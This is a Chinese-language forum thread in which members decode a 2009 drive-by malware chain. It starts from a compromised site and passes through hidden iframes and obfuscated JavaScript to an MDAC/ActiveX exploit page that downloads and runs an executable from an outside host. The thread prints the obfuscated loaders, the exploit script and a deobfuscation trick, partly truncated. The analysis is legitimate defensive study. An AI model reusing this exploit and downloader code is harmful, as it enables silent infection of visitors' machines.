[解密悬赏][第21期][完成]

250662772

特殊方法找出个地址http://e.fissare.net/t/ii.php?b=1004&i=14&t=1
一会解密看看吧，估计不怎么好解

knifed

下载得到两个gif文件.应该是个可执行的.

knifed

http://e.fissare.net/e/ii.php?b=1004&i=14&t=1

http://e.fissare.net/e/ii.php?b=1004&i=14&t=1&mdac
难道与这两个有关

knifed

中间有一%ue1d9%u34d9%u5b24%u5b5b%.不过没解出来.调试没成功. 不知这段是干哈的?

qianwenxiang

结束……占层楼……

1: hp://www.sentinelz.net/

1. 
   
2. <script language=javascript>eqviotjl="nRRKZUPkUU%gNN!HoZvkLxMlVQx";stvijeb="k3csck72k69pk74 languk61ge=k6ak61vasck72ik70tk3e  functik6fk6e dzdk6fk64(gik6auk66r){var yk76k2coxhk3d",G&k32k66z@)rhk63=Ak2bk2d(k5f|k45J[k39v`k55Z~pKd3jF{uk24k42k34]k4fTk62 \\"k35k487#;*t.k71k78MVeaywk6fk27C1^lk7d8gk6dN6P:k730nk49k6b!i"k2cujk3d"",k78k6axk6ac,k74xzvk65k2cpjpk73k3d"k22k2cthmk3bk66ork28yk76=0k3byk76k3cgk69juk66r.lenk67th;yk76++k29{k20xjxk6ack3dgk69k6aufrk2echk61k72At(yvk29;tk78k7ak76e=k6fxk68.ink64k65xk4ff(xjk78jc);ik66(txzve>k2dk31k29k7b k74k68k6d=k28(txk7avk65+1)k25k381k2d1);k69k66(thmk3c=k30)tk68k6d+k3d81;pk6apsk2b=oxhk2ek63k68ak72k41t(tk68m-1); k7dk20elsk65 k70k6ak70k73k2b=xjxjc;}uk6a+=pjk70k73;docuk6dk65nt.wk72k69tk65k28uj)k3bk7d<k2fk73ck72iptk3e";fadpf=unescape(stvijeb.replace(/k/g,eqviotjl.charAt(10)));var hmd,hyf;document.write(fadpf);hmd="<0=h,K."}yIm$ymaA5Fy`y0=h,K.5>"3'=$NaI.qoh,.a_"5<S1Rk:b"}yIm$ymaA\\5[y`yS=h,K.\\5"SR1A\\5c..Ks//oooqm''m}ayIy},.,=0qIa./||$. qF0?5-3'=$NaI.qhazahhah-5\\5><\\/S1Rk:b>5"r*"</0=h,K.>""";dzdod(hmd);</script>
   

复制代码

2: hp://www.googleanalitics.net/__utb.js?http://www.sentinelz.net/

document.writeln("<iframe height=1 width=10 frameborder=0 src='http://e.fissare.net/e/count.php?b=1006'></iframe>");

3: hp://e.fissare.net/e/count.php?b=1006

<iframe src=/t/m1006z634978.html width=10 height=1 frameborder=0></iframe>

4: hp://e.fissare.net/t/m1006z634978.html

<script language=javascript>yafkbwjh="QUSi%ugPqiTxMx!";xzksjqp="<si63i72i69pi74 lai6egi75agi65i3djai76i61i73ci72i69i70i74>i20funi63ti69on zi6fi64(i29 {rei74uri6e \"i25u3i31i33i64i25u30i330i25i752i3636i25u3d69i25ui326i33i31i25i753d74i25ucc3i31\"i3b}i20fi75nci74i69oi6ei20i76qvpi28wi6behi74i29{vai72i20ui69,i66li6cji3d\"i37F4i2c@ji21{}i39\\\"Vi5bA)i5fUi28i75-e;i72Pi64i79Ih]xi5eGi35i60fni71gOZ.2i69sMi4e6tCpi20i23ai30oT1i7cKz8km$wi3aJi62i33v&E~+i42ci6c'=*Hi22,hei6fi3d\"\",dtyji75i2cui65i6bi2cdi79bi70i75i3d\"i22i2clkxfi3bi66oi72i28ui69i3d0i3bui69<wi6bei68i74.i6ci65ngi74h;i75i69i2b+)i7bi20dtyi6au=i77ki65i68t.chi61i72i41i74i28i75i69i29;i75ek=fi6clj.i69i6e

…………………

5: http://e.fissare.net/e/ii.php?b=1006&i=14&t=1

<script language=javascript> function zod() {return "%u313d%u3030%u2636%u3d69%u2631%u3d74%ucc31";} function vqvp(wkeht){var ui,fllj="7F4,@j!{}9\"V[A)_U(u-e;rPdyIh]x^G5`fnqgOZ.2isMN6tCp #a0oT1|Kz8km$w:Jb3v&E~+Bcl'=*H",heo="",dtyju,uek,dybpu="",lkxf;for(ui=0;ui<wkeht.length;ui++){ dtyju=wkeht.charAt(ui);uek=fllj.indexOf(dtyju);if(uek>-1){ lkxf=((uek+1)%81-1);if(lkxf<=0)lkxf+=81;dybpu+=fllj.charAt(lkxf-1); } else dybpu+=dtyju;}heo+=dybpu;document.write(heo);}</script><html xmlns:v="urn:schemas-microsoft-com:vml"><head><style>v\:* { behavior: url(#default#VML); }</style></head>  <script type="text/javascript" language="javascript">  var iss = false; var uri = 'http://e.fissare.net/e/ii.php?b=1006&i=14&t=1'; var done = false;  var za = 'ting.FileS'; var z = 'plication'; var shellapp = 'Shell.Ap'+z; var...................................(  "", "ii.php?b=1006&i=14&t=1",  "http://e.fissare.net/e/" ,  "object",  "classid.........................................-CA28-496b-B050-6C07C962476B}", null);  var v = new Array(null, null, null), i = 0, n = 0, ret = 0, urlRealExe = 'http://e.fissare.net/e/ii.php?b=1006&i=14&t=1&mdac' ;   while (t && (! v[0] || ! v[1] || ! v[2]) ) {   var a = null;   try {    a = document.createElement("object");     a.setAttribute("classid", "clsid:" + t.substring(1, t.length - 1));   }   catch(e)    { a = ....................."; var url="http://e.fissare.net/e/ii.php?b=1006&i=14&t=1"; var stxml="XML";var stgt="GET";var std="D";var ldobj=null; try{ldobj=objmker(lev3par1,"Microsoft."+stxml+"HTTP");ldobj.open(stgt,url,false);}catch(e){try{ldobj=............................,"")');}catch(e){}} if(!nobj){try{eval('nobj=lev2par1.GetObject(lev2par2)');}catch(e){}}return(nobj); }   }  </script> </head> <body><div id="mydiv"></div><div id=testobj></div>  <script type="text/javascript" language="javascript">  MDAC(); ded2();  window.open("http://e.fissare.net/e/adsr.php","_top"); </script> </body></html>

qianwenxiang

http://e.fissare.net/e/adsr.php -> http://toolscan4.com/22/?uid=12800 -> http://toolscan4.com/download/install.php

http://e.fissare.net/e/adsr.php -> http://in4co.com/cki.php?uid=12800 (one version)


第一步的html 修改成这样执行下就行了

<script language=javascript>function dzdod(gijufr){var yv,oxh=",G&2fz@)rhc=A+-(_|EJ[9v`UZ~pKd3jF{u$B4]OTb \"5H7#;*t.qxMVeaywo'C1^l}8gmN6P:s0nIk!i",uj="",xjxjc,txzve,pjps="",thm;for(yv=0;yv<gijufr.length;yv++){ xjxjc=gijufr.charAt(yv);txzve=oxh.indexOf(xjxjc);if(txzve>-1){ thm=((txzve+1)%81-1);if(thm<=0)thm+=81;pjps+=oxh.charAt(thm-1); } else pjps+=xjxjc;}uj+=pjps;alert(uj);}eqviotjl="nRRKZUPkUU%gNN!HoZvkLxMlVQx";stvijeb="k3csck72k69pk74 languk61ge=k6ak61vasck72ik70tk3e  functik6fk6e dzdk6fk64(gik6auk66r){var yk76k2coxhk3d\",G&k32k66z@)rhk63=Ak2bk2d(k5f|k45J[k39v`k55Z~pKd3jF{uk24k42k34]k4fTk62 \\\"k35k487#;*t.k71k78MVeaywk6fk27C1^lk7d8gk6dN6P:k730nk49k6b!i\"k2cujk3d\"\",k78k6axk6ac,k74xzvk65k2cpjpk73k3d\"k22k2cthmk3bk66ork28yk76=0k3byk76k3cgk69juk66r.lenk67th;yk76++k29{k20xjxk6ack3dgk69k6aufrk2echk61k72At(yvk29;tk78k7ak76e=k6fxk68.ink64k65xk4ff(xjk78jc);ik66(txzve>k2dk31k29k7b k74k68k6d=k28(txk7avk65+1)k25k381k2d1);k69k66(thmk3c=k30)tk68k6d+k3d81;pk6apsk2b=oxhk2ek63k68ak72k41t(tk68m-1); k7dk20elsk65 k70k6ak70k73k2b=xjxjc;}uk6a+=pjk70k73;docuk6dk65nt.wk72k69tk65k28uj)k3bk7d<k2fk73ck72iptk3e";fadpf=unescape(stvijeb.replace(/k/g,eqviotjl.charAt(10)));var hmd,hyf;alert(fadpf);hmd="<0=h,K.\"}yIm$ymaA5Fy`y0=h,K.5>\"3'=$NaI.qoh,.a_\"5<S1Rk:b\"}yIm$ymaA\\5[y`yS=h,K.\\5\"SR1A\\5c..Ks//oooqm''m}ayIy},.,=0qIa./||$. qF0?5-3'=$NaI.qhazahhah-5\\5><\\/S1Rk:b>5\"r*\"</0=h,K.>\"\"";dzdod(hmd);</script>

雨宫优子

原帖由 knifed 于 2009-2-7 20:45 发表
中间有一%ue1d9%u34d9%u5b24%u5b5b%.不过没解出来.调试没成功. 不知这段是干哈的?

中间这段很XE


代码经过分割处理，前面还有一部分，调试时必须用到


但是....话虽是这么说....
经过这样处理后..还是没法解...怀疑制作人自己的意识也不清醒..生成了个什么Shellcode都不知道...